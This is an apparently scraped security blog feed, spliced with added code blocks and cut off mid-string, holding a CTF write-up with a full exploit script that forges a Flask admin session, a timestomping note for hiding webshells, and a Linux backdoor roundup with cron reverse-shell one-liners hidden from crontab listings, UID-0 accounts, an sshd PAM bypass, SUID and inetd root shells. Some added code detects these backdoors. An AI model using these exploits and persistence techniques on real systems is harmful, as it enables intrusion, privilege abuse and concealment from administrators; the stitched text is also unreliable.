class="meta">@app.route('/login', methods=['POST'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span><span class="params">()</span>:</span></span><br><span class="line"> username=request.form[<span class="string">'username'</span>]</span><br><span class="line"> password=request.form[<span class="string">'password'</span>]</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">'POST'</span> <span class="keyword">and</span> username != <span class="string">''</span> <span class="keyword">and</span> password != <span class="string">''</span>:</span><br><span class="line"> <span class="keyword">if</span>(username == <span class="string">'admin'</span>):</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>,error=<span class="number">1</span>))</span><br><span class="line"> session[<span class="string">'username'</span>] = username</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/logout', methods=['GET'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">logout</span><span class="params">()</span>:</span></span><br><span class="line"> session.pop(<span class="string">'username'</span>, <span class="keyword">None</span>)</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/upload', methods=['POST'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upload_file</span><span class="params">()</span>:</span></span><br><span 
class="line"> <span class="keyword">if</span> <span class="string">'the_file'</span> <span class="keyword">not</span> <span class="keyword">in</span> request.files:</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"> file = request.files[<span class="string">'the_file'</span>]</span><br><span class="line"> <span class="keyword">if</span> file.filename == <span class="string">''</span>:</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"> <span class="keyword">if</span> file <span class="keyword">and</span> allowed_file(file.filename):</span><br><span class="line"> filename = secure_filename(file.filename)</span><br><span class="line"> file_save_path = os.path.join(app.config[<span class="string">'UPLOAD_FOLDER'</span>], filename)</span><br><span class="line"> <span class="keyword">if</span>(os.path.exists(file_save_path)):</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'This file already exists'</span></span><br><span class="line"> file.save(file_save_path)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'This file is not a zipfile'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> extract_path = file_save_path + <span class="string">'_'</span></span><br><span class="line"> os.system(<span class="string">'unzip -n '</span> + file_save_path + <span class="string">' -d '</span>+ extract_path)</span><br><span class="line"> read_obj = os.popen(<span class="string">'cat '</span> + extract_path + <span class="string">'/*'</span>)</span><br><span class="line"> file = read_obj.read()</span><br><span class="line"> 
read_obj.close()</span><br><span class="line"> os.system(<span class="string">'rm -rf '</span> + extract_path)</span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> file = <span class="keyword">None</span></span><br><span class="line"></span><br><span class="line"> os.remove(file_save_path)</span><br><span class="line"> <span class="keyword">if</span>(file != <span class="keyword">None</span>):</span><br><span class="line"> <span class="keyword">if</span>(file.find(base64.b64decode(<span class="string">'aGN0Zg=='</span>).decode(<span class="string">'utf-8'</span>)) != <span class="number">-1</span>):</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>, error=<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">return</span> Response(file)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> <span class="comment">#app.run(debug=True)</span></span><br><span class="line"> app.run(host=<span class="string">'127.0.0.1'</span>, debug=<span class="keyword">True</span>, port=<span class="number">10008</span>)</span><br></pre></td></tr></table></figure><p>Two things stand out in the upload handler. The extracted files are read with <code>cat extract_path/*</code>, which follows symlinks, and the result is discarded with error=1 if it contains the string <code>hctf</code> (<code>aGN0Zg==</code> is base64 for <code>hctf</code>), so the flag cannot simply be read through the upload. At the same time the login handler refuses the username <code>admin</code>, so the goal becomes forging a session cookie for admin, and for that we need <code>SECRET_KEY</code>.</p><p>The key turns out to be predictable: the random generator is seeded with <code>uuid.getnode()</code>, which on Linux returns the host's MAC address as a 48-bit integer, so <code>SECRET_KEY</code> is a deterministic function of the MAC.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">random.seed(uuid.getnode())</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config['SECRET_KEY'] = str(random.random()*100)</span><br></pre></td></tr></table></figure><p>So read the MAC address from <code>/sys/class/net/eth0/address</code> with the same symlink-in-zip trick.</p><p>MAC 02:42:ac:11:00:02, i.e. 0x0242ac110002 = 2485377892354 as an integer, which is exactly the value <code>uuid.getnode()</code> returned on the target.</p><p>Seeding with an int is deterministic, so the key the app computed at startup can be reproduced offline with python3:</p><figure class="highlight 
python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -c <span class="string">"import random;random.seed(2485377892354);print (str(random.random()*100))"</span></span><br></pre></td></tr></table></figure><p>This gives <code>SECRET_KEY = 42.42408197657815</code> (<code>str()</code> of the float, exactly as the app stored it).</p><p>With that key, sign a session for admin. Flask's <code>SecureCookieSessionInterface</code> delegates to itsdangerous: a base64url JSON payload, a dot, a base64url timestamp, a dot, and an HMAC-SHA1 over the first two parts under a key derived from <code>SECRET_KEY</code> with the salt <code>cookie-session</code>. Forged session: <code>eyJ1c2VybmFtZSI6ImFkbWluIn0.XFk6SQ.dp9Uh_Kd6tGKQ12uY7eqoSzvrPo</code> (the first part decodes to <code>{"username":"admin"}</code>).</p><p>Requesting <code>/</code> with that cookie returns the flag: <code>hctf{2495e2ef667b367a0738f5eae9d6afb983c2}</code></p><p>Full script (found via Baidu) that automates the chain: log in, read <code>/proc/self/environ</code> through a symlink packed into a zip, pull <code>UWSGI_INI</code> and <code>PWD</code> from it, read the ini to find the module name and with it the application source, read the MAC, derive the key and sign the admin session:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span 
class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask.sessions <span class="keyword">import</span> SecureCookieSessionInterface</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read_file</span><span class="params">(file_name)</span>:</span></span><br><span class="line"> link(file_name)</span><br><span class="line"> files = {<span class="string">'the_file'</span>: open(file_name[<span class="number">-5</span>:] + <span class="string">'.zip'</span>, <span class="string">'rb'</span>)}</span><br><span class="line"> r2 = s.post(url+<span class="string">'upload'</span>, files=files)</span><br><span class="line"> <span class="keyword">return</span> r2.text</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">link</span><span class="params">(file_name)</span>:</span></span><br><span class="line"> os.system(<span class="string">'ln -s {file_name} 
{output}'</span>.format(file_name = file_name, output = file_name[<span class="number">-5</span>:]))</span><br><span class="line"> os.system(<span class="string">'zip -y -m {output}.zip {output}'</span>.format(file_name = file_name, output = file_name[<span class="number">-5</span>:]))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://hideandseek.2018.hctf.io/'</span></span><br><span class="line"><span class="keyword">with</span> requests.Session() <span class="keyword">as</span> s:</span><br><span class="line"> user_data = {<span class="string">'username'</span>: <span class="string">'123'</span>, <span class="string">'password'</span>: <span class="string">'123456789'</span>}</span><br><span class="line"> r = s.post(url+<span class="string">'login'</span>, data=user_data)</span><br><span class="line"> en = read_file(<span class="string">'/proc/self/environ'</span>)</span><br><span class="line"> print(en)</span><br><span class="line"> ini = re.search(<span class="string">'UWSGI_INI=(.*?)\x00'</span>, en).group(<span class="number">1</span>)</span><br><span class="line"> pwd = re.search(<span class="string">'PWD=(.*?)\x00'</span>, en).group(<span class="number">1</span>)</span><br><span class="line"> print(ini)</span><br><span class="line"> print(pwd)</span><br><span class="line"> ini = read_file(ini)</span><br><span class="line"> print(ini)</span><br><span class="line"> source = re.search(<span class="string">'module = .*?\.(.*?)\n'</span>, ini).group(<span class="number">1</span>)</span><br><span class="line"> source = pwd+<span class="string">'/'</span>+source+<span class="string">'.py'</span></span><br><span class="line"> source = read_file(source)</span><br><span class="line"> print(source)</span><br><span class="line"> <span class="keyword">if</span>(source.find(<span class="string">'import'</span>) == <span class="number">-1</span>):</span><br><span class="line"> exit(<span 
class="string">'fail'</span>)</span><br><span class="line"> mac = <span class="string">'/sys/class/net/eth0/address'</span></span><br><span class="line"> mac = read_file(mac)</span><br><span class="line"> mac = mac[:<span class="number">-1</span>]</span><br><span class="line"> mac = <span class="string">''</span>.join(mac.split(<span class="string">':'</span>))</span><br><span class="line"> mac = int(mac, <span class="number">16</span>)</span><br><span class="line"> print(mac)</span><br><span class="line"> random.seed(mac)</span><br><span class="line"> key = random.random()*<span class="number">100</span></span><br><span class="line"> print(key)</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">'SECRET_KEY'</span>] = str(key)</span><br><span class="line">payload = {<span class="string">'username'</span>: <span class="string">'admin'</span>}</span><br><span class="line">serializer = SecureCookieSessionInterface().get_signing_serializer(app)</span><br><span class="line">session = serializer.dumps(payload)</span><br><span class="line">print(session)</span><br><span class="line">cookies = {<span class="string">'session'</span>: session}</span><br><span class="line">r = requests.get(url, cookies=cookies)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>]]></content>
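Added example, not from the original writeup or the script above: the whole chain in standard-library Python, so it runs offline without Flask, zip or unzip. symlink_zip builds a zip whose single entry unzip restores as a symlink, which is what zip -y stored above; mac_to_node turns the text of /sys/class/net/eth0/address into the integer uuid.getnode() returns; derive_secret_key repeats the app's own seeding; sign_session and verify_session reproduce what Flask's SecureCookieSessionInterface does through itsdangerous (base64url JSON payload, base64url big-endian timestamp, HMAC-SHA1 over both under a key derived as HMAC-SHA1(SECRET_KEY, "cookie-session")). The MAC and the timestamp are the writeup's values; all function names are my own.

```python
import base64
import hashlib
import hmac
import io
import json
import random
import stat
import zipfile

SALT = b"cookie-session"  # salt Flask passes to itsdangerous for the session cookie


def b64(data: bytes) -> str:
    """URL-safe base64 without '=' padding, the encoding itsdangerous uses."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def symlink_zip(link_name: str, target: str) -> bytes:
    """Zip with one entry that unzip restores as a symlink link_name -> target
    (what `zip -y` stores): the entry data is the target path and the Unix mode
    S_IFLNK|0777 sits in the high 16 bits of the external attributes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(link_name)
        info.create_system = 3  # "made by" Unix, so unzip trusts the mode bits
        info.external_attr = (stat.S_IFLNK | 0o777) * 0x10000
        zf.writestr(info, target)
    return buf.getvalue()


def zip_symlink_target(blob: bytes, link_name: str):
    """Return the symlink target recorded for link_name, or None if it is a plain file."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        info = zf.getinfo(link_name)
        if stat.S_ISLNK(info.external_attr >> 16):
            return zf.read(link_name).decode()
    return None


def mac_to_node(mac_text: str) -> int:
    """'02:42:ac:11:00:02\\n', as read from /sys/class/net/eth0/address, to the
    48-bit integer uuid.getnode() returns for that interface."""
    return int(mac_text.strip().replace(":", ""), 16)


def derive_secret_key(node: int) -> str:
    """The app's derivation: random.seed(uuid.getnode()); str(random.random() * 100).
    random.Random(node) seeds exactly like random.seed(node) on the module RNG."""
    return str(random.Random(node).random() * 100)


def _signing_key(secret_key: str) -> bytes:
    """itsdangerous 'hmac' key derivation: HMAC-SHA1(secret, salt)."""
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def sign_session(secret_key: str, data: dict, timestamp: int) -> str:
    """payload.timestamp.signature as Flask writes it (uncompressed payload)."""
    payload = b64(json.dumps(data, separators=(",", ":"), sort_keys=True).encode())
    ts = b64(timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big"))
    signed = ("%s.%s" % (payload, ts)).encode()
    sig = hmac.new(_signing_key(secret_key), signed, hashlib.sha1).digest()
    return "%s.%s.%s" % (payload, ts, b64(sig))


def verify_session(secret_key: str, cookie: str):
    """Return (data, timestamp) if the cookie verifies under secret_key, else None.
    A payload starting with '.' (zlib-compressed) splits into four parts and is rejected."""
    parts = cookie.split(".")
    if len(parts) != 3:
        return None
    payload, ts, sig = parts
    signed = ("%s.%s" % (payload, ts)).encode()
    expected = hmac.new(_signing_key(secret_key), signed, hashlib.sha1).digest()
    if not hmac.compare_digest(expected, b64decode(sig)):
        return None
    return json.loads(b64decode(payload)), int.from_bytes(b64decode(ts), "big")


if __name__ == "__main__":
    node = mac_to_node("02:42:ac:11:00:02\n")   # the value read from the target
    key = derive_secret_key(node)
    cookie = sign_session(key, {"username": "admin"}, 1549351497)
    print(node, key, cookie, verify_session(key, cookie))
    print(len(symlink_zip("environ", "/proc/self/environ")), "bytes of zip")
```

Pointing verify_session at the writeup's own cookie with the derived key is a cheap offline confirmation that the key is right before anything is sent to the target; a None result means the key, or the interpreter used to derive it, is off.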
<summary type="html">
<h1 id="hide-and-seek"><a href="#hide-and-seek" class="headerlink" title="hide and seek"></a>hide and seek</h1><p>After registering and logging in there is an upload form. It only accepts zip files, and the contents of the files inside the archive are extracted and echoed back on the page. Uploading a PHP webshell fails.</p>
<p>Next, try reading the process environment on Linux, /proc/self/environ, by packing a symlink to it into the zip (unzip recreates the link and the app's cat follows it):</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UWSGI_ORIGINAL_PROC_NAME=/usr/local/bin/uwsgiSUPERVISOR_GROUP_NAME=uwsgiHOSTNAME=c52b2c48ec0bSHLVL=0PYTHON_PIP_VERSION=18.1HOME=/rootGPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421DUWSGI_INI=/app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.iniNGINX_MAX_UPLOAD=0UWSGI_PROCESSES=16STATIC_URL=/staticUWSGI_CHEAPER=2NGINX_VERSION=1.15.8-1~stretchPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binNJS_VERSION=1.15.8.0.2.7-1~stretchLANG=C.UTF-8SUPERVISOR_ENABLED=1PYTHON_VERSION=3.6.8NGINX_WORKER_PROCESSES=autoSUPERVISOR_SERVER_URL=unix:///var/run/supervisor.sockSUPERVISOR_PROCESS_NAME=uwsgiLISTEN_PORT=80STATIC_INDEX=0PWD=/app/hard_t0_guess_n9f5a95b5ku9fgSTATIC_PATH=/app/staticPYTHONPATH=/appUWSGI_RELOADS=0</span><br></pre></td></tr></table></figure>
<p>UWSGI_INI points to /app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.ini, and PWD gives the application directory /app/hard_t0_guess_n9f5a95b5ku9fg.</p>
<p>Read that file the same way<br>
</summary>
</entry>
<entry>
<title>Personal Linux command notes</title>
<link href="http://fdrag0n.github.io/2018/11/11/%E8%87%AA%E7%94%A8Linux%E5%91%BD%E4%BB%A4%E6%89%8B%E5%86%8C/"/>
<id>http://fdrag0n.github.io/2018/11/11/自用Linux命令手册/</id>
<published>2018-11-11T14:42:50.000Z</published>
<updated>2018-11-12T11:57:42.710Z</updated>
<content type="html"><![CDATA[<h1 id="Linux-Unix-修改文件时间戳"><a href="#Linux-Unix-修改文件时间戳" class="headerlink" title="Linux/Unix 修改文件时间戳"></a>Linux/Unix: changing file timestamps</h1><p>A backdoor planted on a Unix box has to have its timestamps adjusted, otherwise a freshly modified file in an old directory stands out immediately; <code>touch</code> does the job directly.</p><p>For example, take the timestamps of index.php and give them to webshell.php, so the two files show the same time.</p><a id="more"></a><p>Usage</p><p><code>touch -r index.php webshell.php</code></p><p>Or set the timestamp to an explicit date and time (format [[CC]YY]MMDDhhmm[.ss]), here 2018-11-11 10:42:30.</p><p><code>touch -t 1811111042.30 webshell.php</code></p><p>Caveat, for either side of the fence: <code>touch</code> sets only atime and mtime. The inode change time, ctime, is updated by the kernel on every inode modification, the touch included, and cannot be set from user space, so <code>stat webshell.php</code> still shows when the file was really last changed, and <code>find /var/www -newerct '1 day ago'</code> lists files whose ctime is recent regardless of what their mtime claims.</p>]]></content>
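Added example, not part of the original note: the same two touch forms done with os.utime, plus the check a responder would run against them. touch and os.utime set atime and mtime only; the kernel stamps ctime on every inode change, the touch included, and offers no call to set it, so a ctime well ahead of mtime is the tell. demo back-dates a temporary file to the 2018-11-11 10:42:30 used above and reports the gap; the function names are mine and the files are created only for the demonstration.

```python
import os
import tempfile
from datetime import datetime


def timestomp_gap(path: str, tolerance: float = 2.0) -> float:
    """Seconds by which ctime is newer than mtime, or 0.0 when they agree within
    tolerance. A genuine write updates both; only a forged mtime leaves a gap,
    because ctime is set by the kernel on every inode change and cannot be forged
    from user space."""
    st = os.stat(path)
    gap = st.st_ctime - st.st_mtime
    return gap if gap > tolerance else 0.0


def touch_t(path: str, when: datetime) -> None:
    """`touch -t`: set atime and mtime to an explicit local time."""
    ts = when.timestamp()
    os.utime(path, (ts, ts))


def touch_r(reference: str, path: str) -> None:
    """`touch -r`: copy atime and mtime from a reference file, nanosecond exact."""
    ref = os.stat(reference)
    os.utime(path, ns=(ref.st_atime_ns, ref.st_mtime_ns))


def demo(tmp_dir=None):
    """Create two files, back-date one as in the note, copy its times to the other,
    and return (gap before, gap after, times copied) as timestomp_gap reports them."""
    fd, path = tempfile.mkstemp(dir=tmp_dir, suffix=".php")
    os.close(fd)
    fd, other = tempfile.mkstemp(dir=tmp_dir, suffix=".php")
    os.close(fd)
    try:
        before = timestomp_gap(path)                       # fresh file: ctime == mtime
        touch_t(path, datetime(2018, 11, 11, 10, 42, 30))  # touch -t 1811111042.30
        after = timestomp_gap(path)                        # ctime is now, mtime is 2018
        touch_r(path, other)                               # touch -r path other
        copied = os.stat(other).st_mtime_ns == os.stat(path).st_mtime_ns
        return before, after, copied
    finally:
        os.unlink(path)
        os.unlink(other)


if __name__ == "__main__":
    print(demo())  # (0.0, years-in-seconds, True)
```

The shell equivalent of timestomp_gap is `stat -c '%n %Y %Z' file`, which prints mtime and ctime as epoch seconds side by side; a large difference between the two columns is the same signal.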
<summary type="html">
<h1 id="Linux-Unix-修改文件时间戳"><a href="#Linux-Unix-修改文件时间戳" class="headerlink" title="Linux/Unix 修改文件时间戳"></a>Linux/Unix: changing file timestamps</h1><p>A backdoor planted on a Unix box has to have its timestamps adjusted, otherwise a freshly modified file in an old directory stands out immediately; <code>touch</code> does the job directly.</p>
<p>For example, take the timestamps of index.php and give them to webshell.php, so the two files show the same time.</p>
</summary>
<category term="linux" scheme="http://fdrag0n.github.io/tags/linux/"/>
</entry>
<entry>
<title>Linux backdoor roundup</title>
<link href="http://fdrag0n.github.io/2018/11/07/2018-11-7-Linux%E5%90%8E%E9%97%A8%E6%80%BB%E7%BB%93/"/>
<id>http://fdrag0n.github.io/2018/11/07/2018-11-7-Linux后门总结/</id>
<published>2018-11-07T11:09:37.000Z</published>
<updated>2018-11-12T11:57:56.052Z</updated>
<content type="html"><![CDATA[<h1 id="测试环境"><a href="#测试环境" class="headerlink" title="测试环境"></a>Test environment</h1><p>Ubuntu 16.04<br>Reverse shell target: 127.0.0.1:233</p><h1 id="cron定时反弹shell"><a href="#cron定时反弹shell" class="headerlink" title="cron定时反弹shell"></a>Scheduled reverse shell via cron</h1><a id="more"></a><h2 id="修改crontab文件"><a href="#修改crontab文件" class="headerlink" title="修改crontab文件"></a>Editing the crontab file</h2><p>Create a script at /etc/… that connects back only if no connection to the target is already open:</p><pre><code>#!/bin/bash
if netstat -ano|grep -v grep | grep "127.0.0.1">/dev/null
then
echo "OK">/dev/null
else
/sbin/iptables --policy INPUT ACCEPT
/sbin/iptables --policy OUTPUT ACCEPT
bash -i >& /dev/tcp/127.0.0.1/233 0>&1
fi</code></pre><p>Make it executable (the setuid bit is irrelevant here, since cron runs the job as root anyway; <code>+x</code> is what matters)</p><p><code>chmod +sx /etc/...</code></p><p>Then add the job to /etc/crontab</p><p><code>*/1 * * * * root /etc/...</code></p><p>Finally reload the cron service<br><code>service cron reload</code></p><h2 id="一句话Crontab后门"><a href="#一句话Crontab后门" class="headerlink" title="一句话Crontab后门"></a>One-line crontab backdoor</h2><p>bash version<br><code>(crontab -l;printf "*/1 * * * * exec 9<> /dev/tcp/127.0.0.1/233;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -</code><br>python version<br><code>(crontab -l;printf "*/5 * * * * /usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",233));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';\r\rno crontab for `whoami`%100c\n")|crontab -</code></p><p>How the hiding works: <code>printf</code> writes the job line, then a carriage return, then the text <code>no crontab for user</code> padded with spaces by <code>%100c</code>. On a terminal the carriage return moves the cursor back to column 0 and the padded fake message overwrites the job, so <code>crontab -l</code> appears to say there is no crontab. The job is still there: <code>crontab -l | cat -A</code> or <code>cat -v /var/spool/cron/crontabs/$USER</code> shows the <code>^M</code> and the command after it. Two caveats: cron runs jobs with <code>/bin/sh</code> unless the crontab sets <code>SHELL</code>, and on Ubuntu <code>/bin/sh</code> is dash, which has no <code>/dev/tcp</code>, so the bash version needs a <code>SHELL=/bin/bash</code> line in the crontab (or <code>bash -c '...'</code>) to work there; the python version does not depend on the shell.</p><h1 id="Linux-Unix-添加-UID-为-0-的用户"><a href="#Linux-Unix-添加-UID-为-0-的用户" class="headerlink" title="Linux/Unix 添加 UID 为 0 的用户"></a>Linux/Unix: adding a user with UID 0</h1><p>Non-interactive, password included (<code>-o</code> allows the duplicate UID, <code>-g root</code> puts the account in the root group)<br><code>useradd -u 0 -o -g root fdrag0n</code></p><pre><code>echo "passwd" | passwd --stdin fdrag0n</code></pre><p><code>passwd --stdin</code> exists on RHEL/CentOS only; on Debian and Ubuntu use <code>echo 'fdrag0n:passwd' | chpasswd</code> instead.</p><p>The system may enforce a password policy,<br>so use a strong password in place of <code>passwd</code>.</p><p>Check: <code>awk -F: '$3 == 0' /etc/passwd</code> should list root and nothing else.</p><h1 id="爆破linux密码"><a href="#爆破linux密码" class="headerlink" title="爆破linux密码"></a>Cracking Linux passwords</h1><p>Copy out /etc/shadow<br>and crack the hashes with hashcat (Ubuntu 16.04 uses sha512crypt, the <code>$6$</code> format, which is hashcat mode 1800).</p><h1 id="ssh公钥免密"><a href="#ssh公钥免密" class="headerlink" title="ssh公钥免密"></a>SSH public key login</h1><p>Write a public key generated on the client into ~/.ssh/authorized_keys on the compromised server; the client then authenticates with the private key and logs in without a password.</p><p>Client:</p><pre><code>$ ssh-keygen -t rsa
$ ls
id_rsa id_rsa.pub</code></pre><p>Append id_rsa.pub to authorized_keys on the server and fix the permissions (with the default StrictModes, sshd ignores keys in a group- or world-writable directory).</p><p>Server:</p><pre><code>$ chmod 600 ~/.ssh/authorized_keys
$ chmod 700 ~/.ssh</code></pre><p>Simple and reliable, but in practice limited by the server's sshd configuration (PubkeyAuthentication, AuthorizedKeysFile, PermitRootLogin), and easy to spot by any admin who looks at authorized_keys.</p><h1 id="软连接后门"><a href="#软连接后门" class="headerlink" title="软连接后门"></a>Symlink (softlink) backdoor</h1><pre><code>ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=23333;</code></pre><p>A classic. Symlink sshd under the name <code>su</code>, start it, and log in on port 23333 with any password. It works because sshd uses its own process name as the PAM service name: named <code>su</code>, it authenticates against /etc/pam.d/su, which contains <code>auth sufficient pam_rootok.so</code>, and since the daemon runs as root that module succeeds without ever checking the password. It needs <code>UsePAM yes</code> in sshd_config, which is the Ubuntu default.</p><p>Stealth is poor: endpoint protection, or simply listing listening ports (<code>ss -lntp</code> shows a process named <code>su</code> on 23333), finds it.</p><p><strong>Does not survive a reboot</strong></p><h1 id="SUID-shell"><a href="#SUID-shell" class="headerlink" title="SUID shell"></a>SUID shell</h1><p>As root</p><pre><code>cp /bin/bash /.fdrag0n
chmod 4755 /.fdrag0n</code></pre><p>As an unprivileged user (<code>-p</code> tells bash to keep the effective UID instead of dropping it)</p><pre><code>/.fdrag0n -p</code></pre><p><strong>How to check</strong></p><pre><code>find / -perm -4000 -ls</code></pre><p>(the old <code>-perm +4000</code> spelling is no longer accepted by GNU find; <code>-4000</code> means all of the given bits set, <code>/4000</code> any of them)</p><h1 id="inetd后门"><a href="#inetd后门" class="headerlink" title="inetd后门"></a>inetd backdoor</h1><p>Edit /etc/inetd.conf (an inetd has to be installed; on Ubuntu that is the openbsd-inetd package)</p><p>Original:</p><pre><code>#chargen dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal</code></pre><p>Change to:</p><pre><code>#discard stream tcp nowait root internal
#discard dgram udp wait root internal
daytime stream tcp nowait root /bin/bash bash -i</code></pre><p>Then make inetd re-read its configuration</p><pre><code>ps -ef | grep inetd
kill -HUP xxx</code></pre><p>and connect with nc to the daytime port (TCP 13): every connection gets a root shell.</p><h1 id="rootkit"><a href="#rootkit" class="headerlink" title="rootkit"></a>rootkit</h1><h2 id="openssh后门"><a href="#openssh后门" class="headerlink" title="openssh后门"></a>OpenSSH backdoor</h2><p>See <a href="https://fdrag0n.github.io/2018/05/15/SSH后门复现/" title="ssh后门复现">https://fdrag0n.github.io/2018/05/15/SSH后门复现/</a></p><h2 id="内核级rookit"><a href="#内核级rookit" class="headerlink" title="内核级rookit"></a>Kernel-level rootkit</h2><p>Not reproduced yet; to be added once it is.</p>]]></content>
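Added example, not from the original post: detection logic for three of the backdoors above, run over constructed sample data rather than a live host. find_hidden_cron_jobs flags crontab lines that contain a carriage return (the "no crontab for user" overwrite trick) or a reverse-shell signature; find_uid0_accounts flags every /etc/passwd entry besides root with UID 0 (the useradd -o -u 0 account); find_inetd_shells flags enabled inetd.conf services whose server program is a shell rather than internal or a real daemon. The samples, the SHELLS set and the REVSHELL pattern are my own; on a real host feed the functions the text of /var/spool/cron/crontabs/user, /etc/passwd and /etc/inetd.conf.

```python
import re

# Programs an inetd service line should never hand a connection to directly.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "sh", "bash"}
# Crude reverse-shell signatures: bash /dev/tcp, python sockets, nc -e, fifo tricks.
REVSHELL = re.compile(r"/dev/tcp/|socket\.socket|nc\s+-e|ncat\b|mkfifo", re.I)


def find_hidden_cron_jobs(crontab_text: str):
    """Return (line number, job text, reasons) for suspicious crontab lines.
    Split on '\\n' only: str.splitlines() would also split on the '\\r' being hunted."""
    findings = []
    for lineno, line in enumerate(crontab_text.split("\n"), start=1):
        reasons = []
        if "\r" in line:
            reasons.append("carriage return hides the job from crontab -l on a terminal")
        if REVSHELL.search(line):
            reasons.append("reverse-shell signature")
        if reasons:
            findings.append((lineno, line.split("\r")[0], reasons))
    return findings


def find_uid0_accounts(passwd_text: str):
    """Login names other than root whose UID field is 0."""
    hits = []
    for line in passwd_text.split("\n"):
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


def find_inetd_shells(inetd_conf: str):
    """(service, server, args) for enabled inetd.conf entries whose server is a shell.
    Field order: service type proto wait user server args..."""
    hits = []
    for line in inetd_conf.split("\n"):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        if len(fields) >= 6 and fields[5] in SHELLS:
            hits.append((fields[0], fields[5], " ".join(fields[6:])))
    return hits


# Constructed samples, not captures from a real host.
SAMPLE_CRONTAB = (
    "# m h dom mon dow command\n"
    "0 3 * * * /usr/bin/certbot renew\n"
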